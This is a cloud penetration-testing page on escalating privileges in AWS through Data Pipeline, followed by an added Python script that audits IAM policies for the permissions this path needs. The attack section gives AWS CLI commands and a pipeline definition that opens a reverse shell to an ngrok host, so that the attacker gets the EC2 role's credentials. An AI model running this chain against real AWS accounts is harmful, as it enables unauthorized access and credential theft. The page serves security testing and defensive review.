AWS - Datapipeline Privesc
datapipeline
For more information about datapipeline, see:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Users with these permissions can escalate privileges by creating a Data Pipeline that executes arbitrary commands with the permissions of the assigned role:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
After creating the pipeline, the attacker updates its definition to dictate specific actions or resource creation:
{
  "objects": [
    {
      "id": "CreateDirectory",
      "type": "ShellCommandActivity",
      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
      "runsOn": { "ref": "instance" }
    },
    {
      "id": "Default",
      "scheduleType": "ondemand",
      "failureAndRerunMode": "CASCADE",
      "name": "Default",
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_datapipeline"
    },
    {
      "id": "instance",
      "name": "instance",
      "type": "Ec2Resource",
      "actionOnTaskFailure": "terminate",
      "actionOnResourceFailure": "retryAll",
      "maximumRetries": "1",
      "instanceType": "t2.micro",
      "securityGroups": ["default"],
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_ec2_profile_instance"
    }
  ]
}
Note that the role in lines 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with an EC2 instance profile.
Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The pipeline definition file, crafted by the attacker, contains directives to execute commands or create resources through the AWS API, using the Data Pipeline's role permissions to potentially gain additional privileges.
Potential Impact: Direct privesc to the specified ec2 service role.
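To review which identities can reach this path, the following added example (not part of the original page or of HackTricks) checks an identity-based IAM policy document for the four permissions named in the heading above and flags iam:PassRole granted on every role without an iam:PassedToService condition. The sample policies, account ID and role name are constructed, and the function names are hypothetical.

```python
import fnmatch

# The four actions the page lists as sufficient for the escalation.
REQUIRED = ("iam:PassRole", "datapipeline:CreatePipeline",
            "datapipeline:PutPipelineDefinition", "datapipeline:ActivatePipeline")

def _as_list(value):
    """IAM accepts a single item or a list for Statement/Action/Resource."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)

def _allows(stmt, action):
    """True if an Allow statement's Action patterns (* and ?) cover action."""
    patterns = _as_list(stmt.get("Action"))
    return stmt.get("Effect") == "Allow" and any(
        fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def _limits_service(stmt):
    """True if the statement carries an iam:PassedToService condition key."""
    return any(key.lower() == "iam:passedtoservice"
               for operator in stmt.get("Condition", {}).values() for key in operator)

def audit_policy(policy):
    """Check one policy document (dict). Simplification: only Allow + Action is
    evaluated; Deny, NotAction, SCPs and permission boundaries are ignored.
    """
    stmts = _as_list(policy.get("Statement"))
    missing = [a for a in REQUIRED if not any(_allows(s, a) for s in stmts)]
    # PassRole on every role with no service restriction is the widest grant.
    unscoped = any(_allows(s, "iam:PassRole") and "*" in _as_list(s.get("Resource"))
                   and not _limits_service(s) for s in stmts)
    return {"escalation_path": not missing, "missing": missing,
            "unscoped_passrole": unscoped}

# Constructed sample policies (account ID and role name are placeholders).
RISKY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["datapipeline:*", "iam:Pass*"], "Resource": "*"}]}
SCOPED = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "datapipeline:*", "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::111122223333:role/etl-worker",
     "Condition": {"StringEquals": {"iam:PassedToService": "datapipeline.amazonaws.com"}}}]}
PARTIAL = {"Version": "2012-10-17", "Statement": {"Effect": "Allow", "Resource": "*",
           "Action": ["iam:PassRole", "datapipeline:CreatePipeline"]}}

if __name__ == "__main__":
    for name, doc in (("RISKY", RISKY), ("SCOPED", SCOPED), ("PARTIAL", PARTIAL)):
        print(name, audit_policy(doc))
```

A policy like SCOPED still reports the path as present, but only toward the one role it names; that role's own permissions then bound the impact.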